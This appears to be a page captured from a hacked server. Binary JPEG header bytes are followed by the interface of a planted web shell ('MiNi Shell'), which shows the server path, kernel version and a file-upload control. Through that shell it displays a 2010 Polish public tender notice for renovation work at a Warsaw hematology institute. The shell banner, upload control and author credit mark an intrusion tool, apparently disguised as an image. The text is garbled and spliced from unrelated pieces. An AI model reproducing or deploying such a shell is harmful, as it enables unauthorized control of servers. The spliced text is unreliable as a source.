JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100917/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100917/255879-N-2010.html

<p class="kh_header"><b>Warszawa: IHIT/P/48/2010 - Roboty remontowe w Instytucie dotyczące budynków A , B i D w Warszawie przy ul. Chocimskiej 5</b><br>
<b>Numer ogłoszenia: 255879 - 2010; data zamieszczenia: 17.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hematologii i Transfuzjologii , ul. Indiry Gandhi 14, 02-776 Warszawa, woj. mazowieckie, tel. 022 349 62 22, faks 022 349 62 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ihit.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> IHIT/P/48/2010 - Roboty remontowe w Instytucie dotyczące budynków A , B i D w Warszawie przy ul. Chocimskiej 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Określenie przedmiotu zamówienia: Roboty remontowe w Instytucie dotyczące  budynków A, B i D w Warszawie przy ul. Chocimskiej 5
Zakres robót
I.   Naprawa dachu nad agregatem wraz z remontem pomieszczeń
w tym:
-    wykonanie nowego pokrycia dachowego z obróbkami, rynnami rurami spustowymi
-    remont tynków, usunięcie zacieków i roboty malarskie
II.  Prace w pomieszczeniach starej kotłowni do strony Warsztatu 
      Stolarskiego
       w tym:
A.   Wejście do Budynku A (do Bufetu)
       -   usunięcie grzyba, 
       -   nowe tynki, 
       -   nowe pokrycie dachu nad wejściem do magazynu ziemniaków papą termozgrzewalną 
           wraz z obróbkami blacharskimi, 
       -   nowa rozdzielnia elektryczna 
B.   Wymiana stropodachów nad  dwoma pomieszczeniami przyległymi do Budynku A
       -    wymiana drewnianego stropodachu o pow. ca  30 m2 nad pomieszczeniem piwnicy 
             przylegającej do warsztatu stolarskiego
       -    wymiana drewnianego stropodachu o pow. ca  70 m2 nad pomieszczeniem piwnicy
             przylegającej do Bud.A (dawna kotłownia węglowa)
       -    prace budowlane polegające na odgrzybieniu, usunięciu zacieków i pomalowaniu 
            w/w pomieszczeń
III. Miejscowy remont dachów
        w tym:
A.   Remont dachu Budynek A
       -  wymiana obróbek blacharskich, rynien i rur spustowych
       -  miejscowa wymiana papy
       -  przesmarowanie dach IZOLBETEM  D
       -  remont kominów nad poziomem dachu
B.   Remont dachu Budynek B i inne roboty w budynku B
       -  wymiana obróbek blacharskich, rynien i rur spustowych
       -  miejscowa wymiana papy
       -  przesmarowanie dach IZOLBETEM  D
       -  remont kominów nad poziomem dachu
       -  naprawa dachu przy wejściu do PBM wraz z miejscowym ociepleniem dachu
       -  wymiana okładziny ściennej, kasowanie zacieków oraz roboty malarskie
C.   Remont dachu Budynek D
       -  wymiana obróbek blacharskich, rynien i rur spustowych
       -  miejscowa wymiana papy
       -  przesmarowanie dach IZOLBETEM D

IV. Prace remontowe dotyczące Apteki
       w tym:
A.   Roboty w pomieszczeniu (wejście do Apteki)
 -    roboty branży budowlanej polegające na wyburzeniu ścianki, zerwaniu posadzki, tynków, likwidacji zacieków, wymurowaniu nowej ścianki z otworem drzwiowym, oraz roboty posadzkarskie, wykończeniowe i malarskie
       -    roboty branży elektrycznej polegające na dostosowaniu oświetlenia po zmianach w
            wejściu do Apteki, głównie dotyczy oświetlenia pomieszczeń
       -    roboty naprawcze w zakresie obróbek blacharskich, rynny i rur spustowych na tarasie 
            nad wejściem do Apteki
B.   Komora przyjęć leków w Aptece
       a.  Wykonanie i montaż chłodzonego przedsionka o wymiarach zewnętrznych  [cm] 
            250dł. x 226,5 szer. x 297,5 wys. stanowiącego komorę przyjęć  i ekspedycji leków 
            usytuowanego przed wejściem do komory chłodniczej pełniącej funkcję magazynu
            leków apteki Instytutu przy ul. Chocimskiej 5.
            Obudowa izotermiczna  wykonana w postaci prefabrykatów z płyty  warstwowej  
            z rdzeniem poliuretanowym o grubości 80 mm. szczelnie ze sobą połączonych (atest PZH)                                                                                             
            Podłoga wykończona higieniczną blachą aluminiową przeciwpoślizgową. 
            Drzwi chłodnicze przedsionka o wymiarach [cm] 90 x 2000 z zamkiem na klucz.  
            Zadaszenie przedsionka i wejścia do niego stanowić będzie dodatkowy dach z blachy 
            połączony konstrukcją z już istniejącym dachem nad  komorą chłodniczą.                    
            Komora  podniesiona o ca 20 cm nad poziom posadowienia, zgodnie z częścią  
            istniejącą. Całość posadowiona z prawej strony komory magazynowej, połączona
            i uszczelniona przy pomocy profili z blachy lakierowanej. Wejście do komory magazynowej 
            będzie możliwe tylko przez przedsionek stanowiący komorę przyjęć i ekspedycji leków.
            Pomieszczenia - istniejąca komora (posiada izolowane drzwi ) a w przedsionku
            izolowane drzwi do wykonania. 
       b.  Wykonanie i montaż instalacji chłodniczo-grzewczej przedsionka. 
            Instalacja chłodniczo-grzewcza  przedsionka to agregat chłodniczy z funkcją  grzania 
            utrzymujący żądaną  temperaturę przechowywanych leków niezależnie od pory roku i   
            temperatury zewnętrznej. Zakres temperatury : 20C do 80C.
c.	Wykonanie i montaż konstrukcji dystansującej wewnątrz  ww komory chłodniczej i
      przedsionka 
            Konstrukcja   wykonana z siatki z drutu ocynkowanego o dużej sztywności zostanie 
            zamocowana w odpowiednich miejscach do ścian pomieszczenia, zapewniając swobodny 
            przepływ powietrza  pomiędzy ścianą a opakowaniami z lekami. Wymiary komory 
            istniejącej 5,00x2,50x3,00 w metrach trzymujących trwały odstęp opakowań z lekami w 
            odległości 10 cm od ścian  pomieszczenia.
C.    Wykonanie kraty przesuwnej w Budynku A I p. Magazyn Gospodarczy o wymiarach 
        160x200[cm]
        -  rama kraty z profilu zamkniętego 40mm  -30mm
        -  pręty kraty z profilu zamkniętego 20mm -20mm
        -  zamek atestowany
V.  Inne prace remontowe
       w tym:
A.   Naprawa balkonu w Budynku B
       -   uzupełnienie ubytków betonu
       -   naprawa zakotwienia balustrady
       -   prace malarskie
B.   Wymiana posadzki Sterylizacja i inne prace malarskie 
       Prace remontowe polegają na:
       -  zerwaniu istniejących posadzek z tworzyw sztucznych
       -  wykonaniu nowej posadzki z gresu oraz cokolika
        -  prac malarskich we wskazanych lokalizacjach z usunięciem zacieków i innych
           czynności
C.   Dach nad maszynownią OPS
       Prace remontowe polegają na:
       -  rozebraniu starych i wykonaniu nowych obróbek blacharskich przy ścianach budynku
       -  obudowie połączenia komina z blachy i kanalizacji deszczowej na poziomie dachu OPS
       -  wymianie rynien i rur spustowych
       -  naprawy sufitu podwieszonego
       -  skasowania zacieków i malowania części pomieszczenia
       -  wykonania kratki ściekowej
       W załączeniu detal kalenicy (mocowanie obróbek blacharskich)

W załączeniu :

STROPODACH PŁASKI 

Poz.	Wyszczególnienie
1	Konstrukcja - dwuteownik 180
2	Podłoże nośne - blacha trapezowa T-45
3	Paraizolacja - np. Folia FE 0,2 mm
4	Termoizolacja - przyjęto twardą płytę mineralną o grubości 12 cm
5	Pokrycie papowe
6	Ściany wzmocnione wieńcem żelbetowym
7	Wykonanie obróbek blacharskich, rynien i rur spustowych

Pełny zakres przedmiotu zamówienia  określony jest w kosztorysach nakładczych oraz Specyfikacji technicznej wykonania i odbioru robót   ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie  dokumentu- oświadczenie Wykonawcy zgodnie z zał. nr 2 do SIWZ , metodą warunku granicznego spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  przez Wykonawcę , jeżeli wykaże on, że:
a)wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli   okres
  prowadzenia działalności jest krótszy  - w tym okresie, co najmniej 1 robotę budowlaną  w  budynkach służby zdrowia  - budynek czynny  o wartości minimum 200.000, 00 zł brutto
Ocena spełniania warunku nastąpi na podstawie dokumentu , metodą warunku granicznego  spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie  dokumentu- oświadczenie Wykonawcy zgodnie z zał. nr 2 do SIWZ , metodą warunku granicznego spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  przez Wykonawcę , jeżeli wykaże on, że:
a)dysponuje osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania budową - Kierownik Budowy
 b)dysponuje osobą posiadającą uprawnienia do kierowania robotami w zakresie 
  budowy instalacji elektrycznych i sieci- Kierownik Robót Elektrycznych
Wszystkie w/w osoby w pkt. a, b, c muszą być wpisane na listę członków  właściwej Izby Samorządu Zawodowego.
 c)dysponuje co najmniej 1 osobą posiadającą  stosowne aktualne uprawnienia eksploatacyjne do 1kV. 
Ocena spełniania warunku nastąpi na podstawie dokumentu , metodą warunku granicznego  spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  przez Wykonawcę , jeżeli wykaże on, że:
 a)jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
  działalności  na kwotę  nie mniejsza niż 100.000,00 zł.
Ocena spełniania warunku nastąpi na podstawie dokumentu , metodą warunku granicznego  spełnia /nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający zastrzega sobie możliwość wprowadzenia zmiany, w niżej przedstawionym zakresie:
1.1. W przypadku zmiany danych podmiotowych wykonawcy (np. w wyniku przekształcenia) 
1.2.Zmiany  terminu realizacji wynikającego z wystąpienia  nieprzewidzianych a niezbędnych  do wykonania zamówienia robót dodatkowych o których mowa §9 pkt. 3 wzoru umowy
1.3. Wyżej wymienione zmiany mogą być dokonane na wniosek Zamawiającego lub  
       Wykonawcy, za zgoda obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ihit.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Hematologii i Transfuzjologii 
02-776 Warszawa, ul. Indiry Gandhi 14, V piętro p. 508.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2010 godzina 09:00, miejsce: Instytut Hematologii i Transfuzjologii
02-776 Warszawa, ul. Indiry Gandhi 14, I piętro p. 144A (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com